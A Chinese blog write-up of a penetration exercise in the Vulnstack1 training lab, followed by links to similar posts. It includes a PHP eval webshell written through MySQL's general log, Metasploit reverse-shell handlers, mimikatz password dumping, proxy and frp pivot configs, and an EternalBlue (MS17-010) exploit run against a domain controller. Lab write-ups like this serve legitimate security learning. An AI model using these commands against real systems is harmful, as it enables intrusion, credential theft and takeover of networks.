Vulnstack1学习

最新推荐文章于 2024-07-14 20:42:22 发布
最新推荐文章于 2024-07-14 20:42:22 发布
阅读量1.1k 收藏 4
点赞数 1
分类专栏: 学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43820662/article/details/109289778
版权

文章目录

一、环境搭建

一共三台机器,其中w7属于外网入口,w2003与windows server2008属于内网主机。因此为了实现环境需要为w7设置两张网卡,一张内网,一张外网。

w7的设置

在这里插入图片描述

windows server2008
在这里插入图片描述

接下来就是打开虚拟机,看看是否有网络不通的情况了。
正确配置时,w7(关防火墙情况下)、w2003、windows server 2008 都能互相ping通。
最后再打开w7里面的phpstudy就可以开始操作了。
我的环境大概就是这样

二、拿下边界服务器

nmap开扫目标外网ip 192.168.147.132,发现存在80端口
在这里插入图片描述访问url,直接测试数据库的默认账号密码root:root,结果还真是。

在这里插入图片描述
尝试直连数据库,直接一步到位获取webshell,结果发现该数据库不允许远程外连。

在这里插入图片描述
只能登录phpmyadmin,老老实实,一步一步写webshell了。

在这里插入图片描述
登录进去后,此时我们写shell的方法有
①into outfile直接写shell进入网站目录
前提:具有mysql设置了写权限和知道网站的绝对路径
②利用mysql的日志文件,将一句话木马写进去

这里使用的是日志写shell

show variables like '%general%';#查看日志状态

结果显示日志当前关闭,位置为stu1.log
在这里插入图片描述

set global general_log="on"
set global general_log_file="c:\\phpstudy\\WWW\\123.php"#要用两个斜杠,第一个是转义符

在这里插入图片描述
此时日志成功打开,并且内容会保存到网站根目录的123.php下
将一句话木马写如日志即可

select "<?php eval($_POST['cmd']);?>"

直接蚁剑走起。
在这里插入图片描述上传msf马,webshell虚拟终端中运行,成功回弹shell
在这里插入图片描述

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.147.129
set lport 4444
run

在这里插入图片描述至此,拿下w7

三、内网信息收集

meterpreter直接加载mimikatz跑出明文密码(这里密码是被我改过的),知道密码后可以开启3389登录等。

在这里插入图片描述

通过各种手段,知道了内网的ip段(ipconfig、net config Workstation),也找到了域控的ip
在这里插入图片描述
在这里插入图片描述
上传nmap到该机器(这里该w7已经安装了nmap了,直接用即可),对其内网段进行扫描存活主机及开放服务。

在这里插入图片描述

四、内网穿透

前面发现,两台机器均开启445端口,不用多说,总之先永恒之蓝ms17-010怼上去。
但这里需要解决的问题是,环境中,只有w7是能够与外网相连的,w2003和windoswserver都是无法连接外网。这就导致,我们需要先进行内网穿透才能够在kali上访问到它们。

这里使用的工具是EarthWorm+proxychains
将ew上传到受控主机w7上,开启正向socks5代理
在这里插入图片描述
之后kali中一般自带proxychains,修改proxychains的配置文件

su root
vim /etc/proxychains.conf

注释或者修改掉原本的ProxyList修改为如下
在这里插入图片描述(PS:socke5在会话层,因此一般只能代理应用层的流量,而更底层的如ICMP协议等流量就无法被接管,这也正是前面需要上传nmap到目标计算机而不直接使用ew代理nmap的原因)

五、横向渗透

使用proxychains代理打开msf,使用ms17-010漏洞分析模块,对域控服务器进行分析,发现确实存在这样的漏洞。

proxychains msfconsole
use auxiliary/scanner/smb/smb_ms17_010 
set rhost 192.168.52.138
run

在这里插入图片描述
在利用攻击模块的时候又出现了一个问题,我们前面只设置了正向代理,只实现了kali能够通过w7访问域控,那成功拿下域控后我们该怎么获取回弹shell?

这里我选择中转监听。用frp做内网穿透(访问w7的某个端口=访问kali的某个端口,这样就能获取到回弹shell了)
具体实现:kali上配置frp客户端frpc,w7上配置frp服务段frps
Kali的frpc.ini配置如下

[common]
server_addr = 192.168.147.132		#frp服务端的IP地址
server_port = 5555	#frp服务的端口
token = sdfsd-56-cxz-df	 #token

[reverse_tcp]
type = tcp
local_ip = 192.168.147.129#kali的IP
local_port = 6666
remote_port = 7777#当访问frp服务端192.168.147.132的7777端口时,等于访问客户端192.168.147.129的6666端口

在这里插入图片描述
w7的frps.ini的配置如下
在这里插入图片描述
运行frp服务端与客户端
在这里插入图片描述
在这里插入图片描述

成功建立了联系后,就可以利用ms17-010来攻击域控并获取回弹shell了

现在先理清关系:
访问w7的7777端口等价于访问kali的6666端口。因此我们的攻击payload需要写w7的ip和端口(这里的ip需要写域控服务器能访问到的ip即192.168.52.143)。然后再另开一个msf来侦听kali本机的6666端口。

①开启侦听回弹shell
另开一个cmd

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.147.129
set lport 6666
run

在这里插入图片描述

②利用ms17-010攻击
在被代理的msf上使用工具模块

use exploit/windows/smb/ms17_010_eternalblue 
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.52.138
set lhost 192.168.52.143
set lport 7777
run

在这里插入图片描述

成功获取域控服务器的shell,撒花撒花~;从后就是各种权限维持了。创建计划任务、开机自启等等都能够实现。

在这里插入图片描述

如月专注
关注
专栏目录
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2190
红日靶场渗透教程
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 914
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
Vulnstack(一)
iO快到碗里来
11-12 9745
0x00 Preface 网上有很多关于 Vulnstack(一) 的优质文章,本篇文章仅用于记录笔者自身的学习过程。 0x01 环境准备 共有三台机器,Win7是对外的web机,win2003和win2008是内网机器。 VM1(Win7)添加一块网卡,分别设置为:VMnet1(仅主机模式)、VMnet8(NAT模式) VM2(Win2003)网卡设置为:VMnet1(仅主机模式) VM2(Win2008)网卡设置为:VMnet1(仅主机模式) 打开Win2003、Win2008,输入默认
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记
2401_85599271的博客
06-25 787
然后访问其80端口,是一个phpinfo()页面:以其为根目录,再扫描其他路径。扫描工具很多,能不能扫出有用信息还是看字典是否强大。这里是扫出来phpmyadmin和beifen.rar路径。
Vulnstack(1)
ppbgi的博客
05-25 293
信息收集 进行ip的扫描以及开放端口的探测: 扫描到有80端口,进行访问: 尝试在phpstuday中能获得的信息,发现有输入框,尝试弱口令: 发现可以登录,进行目录后台的扫描: 发现有phpmyadmin目录,进行登录: 然后尝试写入一句话木马来获取shell: show variables like '%general%'; #查看日志状态 SET GLOBAL general_log='on' #开启general set global general
VulnStack靶场(一)
Lyaas的博客
06-02 1107
ATT&CK——VulnStack1红队(一)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 1053
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
2024年最新Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)
2401_84297265的博客
05-03 1653
该内网靶场的渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行域命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……
2024年网安最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84252281的博客
05-03 1744
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
vulnstack 1
aliexiansheng的博客
12-15 432
靶机搭建 靶机的下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/#desc 下载好后需要在VM中,先配置好两块网卡。 靶机介绍 web服务器 --------》 windows7 域成员主机 --------》 win2k3 域控主机 ---------》 win2008 靶机配置 (本人下载的靶机时间久远,不知道中途有没有动过,192.168.52段的ip是已经固定好的) win7 : eth1 192.168.77.X eth2
vulnstack(一)
qq_63928796的博客
03-17 749
三台机器在同一内网中,win7 web服务开放在外网,只能通过拿下win7后将其作为跳板进行横向渗透,拿下win2008和win2003服务器。就可以了。
vulnstack1
weixin_46128614的博客
03-27 1989
去到win7虚拟机,打开phpstudy 拿webshell nmap扫描一下 (3389是我后面打开的,前面扫不到的) 访问80端口,直接跳到phpstudy探针 获取到了系统路径和系统版本 dirb扫描目录发现了phpmyadmin 弱密码root:root 直接进了phpmyadmin后台 关于phpmyadmin_getshell见我另一篇博客 phpmyadmin_getshell...
Vulnstack----1、ATT&CK红队评估实战靶场一
七天
08-01 1383
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。域用户:dev1、root-tvi862ubeh。win7内网ip:192.168.52.143。1、ip地址:192.168.144.132。内网ip地址:192.168.52.143。内网网段:192.168.52.0/24。
红日靶场vulnstack (一)
最新发布
2301_76227305的博客
07-14 975
这个是比较基础的靶机,只要理清内网的思路,再稍微了解一下横向移动,以及端口的作用,基本就可以啦。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习
vulnstack1--红队靶机
niqiu320的博客
05-31 593
思路流程: 环境搭建(靶机环境) 一、前渗透的阶段 首先信息收集 getshell 尝试内网信息收集 二、后渗透阶段 (一)msf和cs联动 内网信息收集 三、攻击域(内网渗透) (一)提权 (二)横向移动 攻击域控 ...
红日安全ATT&CK靶机实战系列之vulnstack1
黑白的博客
04-13 7725
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 边下载着,可以开始vmware的网络配置 下图为官方给出的,从虚拟机网络来看 攻击者:kali+windows的攻击机 VM1:对外边界服务器,win7 VM2:域成员,2003 VM3:域控,2008 所以这中间出现两个网段,一个外网网段,一个内网网段 鉴于需要两个网段,我们需要在vmware上做一些配置 首先,用一
【红日靶场】vulnstack1-完整渗透过程
信安是不可或缺的一部分!
09-26 1624
大家有兴趣可以尝试获取,也可以通过网上披露的已知漏洞进行攻击,也可以做深入的代码审计方法很多,包括使用永痕之蓝漏洞,msf可以直接提到system权限,这里不在继续。没有识别到杀软,可以做msf上线或者做内网穿透或者冰蝎隧道(不推荐),看个人选择,也可以上线cs,做横向移动或者权限维持,这里我选择做简单的权限维持。因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003。上传图片成功但是需要审核:这里就不能上传了,找一下后台登录点。
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值